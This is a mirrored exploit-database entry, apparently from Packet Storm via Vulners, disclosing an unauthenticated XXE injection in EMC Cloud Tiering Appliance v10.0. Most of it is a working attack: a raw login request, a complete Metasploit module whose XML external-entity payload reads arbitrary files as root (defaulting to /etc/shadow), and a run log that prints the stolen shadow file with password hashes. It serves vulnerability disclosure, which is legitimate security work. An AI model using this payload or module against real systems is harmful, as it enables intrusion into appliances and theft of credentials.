Lucene search
K

EMC Cloud Tiering Appliance 10.0 XXE Injection

🗓️ 31 Mar 2014 00:00:00Reported by Brandon PerryType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

EMC Cloud Tiering Appliance v10.0 Unauthed XXE Injection allows attacker to read arbitrary files as root user

Code
`EMC Cloud Tiering Appliance v10.0 Unauthed XXE  
  
The following authentication request is susceptible to an XXE attack:  
  
POST /api/login HTTP/1.1  
Host: 172.31.16.99  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: JSESSIONID=12818F1AC5C744CF444B2683ABF6E8AC  
Connection: keep-alive  
Referer: https://172.31.16.99/UxFramework/UxFlashApplication.swf  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 213  
  
<Request>  
<Username>root</Username>  
<Password>114,97,105,110</Password>  
</Request>  
  
  
--------------------------------------------  
  
The following metasploit module will exploit this to read an arbitrary file from the file system:  
  
# This module requires Metasploit: http//metasploit.com/download  
##  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Auxiliary  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'EMC CTA Unauthenticated XXE Arbitrary File Read',  
'Description' => %q{  
EMC CTA v10.0 is susceptible to an unauthenticated XXE attack  
that allows an attacker to read arbitrary files from the file system  
with the permissions of the root user.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Brandon Perry <[email protected]>', #metasploit module  
],  
'References' =>  
[  
],  
'DisclosureDate' => 'Mar 31 2014'  
))  
  
register_options(  
[  
OptString.new('TARGETURI', [ true, "Base directory path", '/']),  
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),  
], self.class)  
end  
  
def run  
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>  
<!DOCTYPE foo [  
<!ELEMENT foo ANY >  
<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}" >]>  
<Request>  
<Username>root</Username>  
<Password>&xxe;</Password>  
</Request>  
}  
  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'api', 'login'),  
'method' => 'POST',  
'data' => pay  
})  
  
file = /For input string: "(.*)"/m.match(res.body)  
file = file[1]  
  
path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])  
  
print_good("File saved to: " + path)  
end  
end  
  
----------------------------------------------------------------  
  
Quick run:  
  
msf auxiliary(emc_cta_xxe) > show options  
  
Module options (auxiliary/gather/emc_cta_xxe):  
  
Name Current Setting Required Description  
---- --------------- -------- -----------  
FILEPATH /etc/shadow yes The filepath to read on the server  
Proxies http:127.0.0.1:8080 no Use a proxy chain  
RHOST 172.31.16.99 yes The target address  
RPORT 443 yes The target port  
TARGETURI / yes Base directory path  
VHOST no HTTP server virtual host  
  
msf auxiliary(emc_cta_xxe) > run  
  
[+] File saved to: /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt  
[*] Auxiliary module execution completed  
msf auxiliary(emc_cta_xxe) > cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt  
[*] exec: cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt  
  
root:u4sA.C2vNqNF.:15913::::::  
bin:*:15913:0:99999:0:0::  
daemon:*:15913:0:99999:0:0::  
lp:*:15913:0:99999:0:0::  
mail:*:15913:0:99999:0:0::  
news:*:15913:0:99999:0:0::  
uucp:*:15913:0:99999:0:0::  
man:*:15913:0:99999:0:0::  
wwwrun:*:15913:0:99999:0:0::  
ftp:*:15913:0:99999:0:0::  
nobody:*:15913:0:99999:0:0::  
messagebus:*:15913:0:99999:0:0::  
polkituser:*:15913:0:99999:0:0::  
haldaemon:*:15913:0:99999:0:0::  
sshd:*:15913:0:99999:0:0::  
uuidd:*:15913:0:99999:0:0::  
postgres:*:15913:0:99999:0:0::  
ntp:*:15913:0:99999:0:0::  
suse-ncc:*:15913:0:99999:0:0::  
super:u4sA.C2vNqNF.:15913:0:99999:0:0::  
msf auxiliary(emc_cta_xxe) >  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2014 00:00Current
0.2Low risk
Vulners AI Score0.2
23